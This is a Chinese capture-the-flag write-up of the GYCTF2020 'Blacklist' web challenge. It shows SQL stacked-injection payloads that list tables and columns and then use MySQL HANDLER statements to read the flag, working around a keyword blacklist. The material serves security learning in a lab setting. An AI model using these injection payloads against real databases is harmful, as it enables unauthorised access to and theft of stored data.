[GYCTF2020]Blacklist

前言

文章所涉及的資料來自互聯網整理和個人總結，意在于個人學習和經驗匯總，如有什么地方侵權，請聯系本人刪除，謝謝！本文僅用于學習與交流，不得用于非法用途！

參考了高諾琪師傅的文章：https://www.cnblogs.com/gaonuoqi/p/12398554.html

一、收集信息

過濾了很多東西，過濾了prepare預編譯用不了，過濾了alter和rename就添改不了表、列名。
但可以查看一下表名

1';show tables;#

有兩個表，查看一下FlagHere

1';show columns from FlagHere;#

看到有flag字段，應該就是這個了！

這次就用handler函數進行堆注入！
用法：
HANDLER table_name OPEN語句打開一個表,實際這里聲明了一個表的句柄
HANDLER table_name READ FIRST獲取句柄的第一行，通過READ NEXT依次獲取其它行。最后一行執行之后再執行NEXT會返回一個空的結果
HANDLER table_name CLOSE來關閉打開的句柄

二、payload

1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#

感謝BUUCTF提供的平臺練習！

總結

以上是生活随笔為你收集整理的[GYCTF2020]Blacklist 使用handler函数进行sql堆注入的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。